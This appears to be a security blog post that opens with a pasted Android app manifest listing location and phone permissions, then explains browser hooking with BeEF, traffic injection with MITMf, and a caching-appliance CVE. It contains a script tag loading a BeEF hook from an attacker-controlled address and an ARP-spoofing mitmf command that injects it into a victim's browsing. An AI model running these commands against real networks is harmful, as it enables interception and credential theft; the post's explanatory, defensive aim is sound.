<manifest xmlns:android="http://schemas.android.com/apk/res/android"
package="com.photoeffect"
android:versionCode="1"
android:versionName="1.0" >

<uses-sdk
    android:minSdkVersion="8"
    android:targetSdkVersion="18" />

<uses-permission android:name="android.permission.INTERNET" />
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
<uses-permission android:name="android.permission.ACCESS_LOCATION_EXTRA_COMMANDS" />
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />
<uses-permission android:name="com.example.towntour.permission.MAPS_RECEIVE" />
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
<uses-permission android:name="android.permission.CALL_PHONE" />
<uses-permission android:name="android.permission.READ_PHONE_STATE" />
<uses-permission android:name="com.google.android.providers.gsf.permission.READ_GSERVICES" />

Mobile apps like your wife or girlfriend. They are tracing you!

 

 

 

 

 

The incentive of caching & Web browser exploitation – Hacker benefit

 

Preface

Bring up hypothesis boldly while prove it conscientiously and carefully.  We hypothesis cyber criminal case objective to steal the data. The gatekeeper is the credential. For instance user password. We known that the enhancement of authentication was added to specifics technology. Yes, it is a personal electronic certificate. Do you think whether the criminal will be focused on client side since it will be more easy to collect the information?

Concept of theory – according to BeEF (The Browser Exploitation Framework Project)

Hook the web browser are operating in two different technique. They are ….. (see below):

 

BeEF ( Browser Exploitation Framework)

The BeEF hook is a JavaScript file hosted on the BeEF server  that needs to run on client browsers. The hook mechanics looks straight forward that it embedded parameters (see below) on a web page lure victim execute (click). It re-direct the victim connection to BeEF server afterwards. As a result it can collect the information on browser includes the credential.

<script src=”http://192.168.xxx.xxx:3000/hook.js” type=”text/javascript”></script>

Reminder: BeEF is a platform which you can use to generate and deliver payloads directly to the target web browser. The BeEF attack tool is written in the Ruby programming language.

 

MITMf (man in the middle attack framwork)

Hacker can make use of different tool to do the MITM. BeEF server contained the specific feature. Below simple idea of script objective injected the hook.js script into the websites that the target visited.

mitmf --spoof --arp -i <interface> --gateway <router IP> --target <target IP> --inject --js-url <hook.js URL>

Reminder: An MITM attack is only possible if you have control over the network between the victim and server.

What  is the incentive in between hook and cache?

We known that our web browser contained many information. Even though you do not save the password and user ID. However web surfing history will be recorded until you clear manually or purge the data by configuration setting. Human will be step down their alert until incident happen. So sometimes it provides a way to bad guy doing some jobs silently. Let’s take a closer looks of our assumption.

Our virtual reality assumption
  1. See below diagram (wan accelerator architecture and handshake diagram), hook the browser can investigate the traffics and do a passive information gather to receive the understand of the operation peers.

WAN accelerator architecture and handshake diagram

Network caching technology conceptual diagram

2. Network caching technology is hard to avoid vulnerability occurs. For instance CVE-2017-7307 proof that Riverbed RiOS before 9.0.1 does not properly restrict shell access in single-user mode, which makes it easier for physically proximate attackers to obtain root privileges and access decrypted data by replacing the /opt/tms/bin/cli file.

3. We understand that this is an vendor appliance design OS design limitation. However hacker can relies on hook to the browser advantage learn the details and find their target. They can relies on  this vulnerability do more works to steal the information.  A malware out break to more client machine might happen in such circumstances (see below picture – Cache system has been compromised) since the data contained in cache has been compromised.

Cache system has been compromised

Summary:

To setup a comphensive prevention detection system, priority to do is know how to hack. Since hacker might know what is the benefits on their side. As a matter of fact a enterprise stated that they employ hacker to become thier cyber security team member. My observation is that IT security industry looks changing the shape. The security team key responsibility is doing report creation works, project and vendor management on projects. But this is not the way!

 

 

 

 

 

antihackingonline.com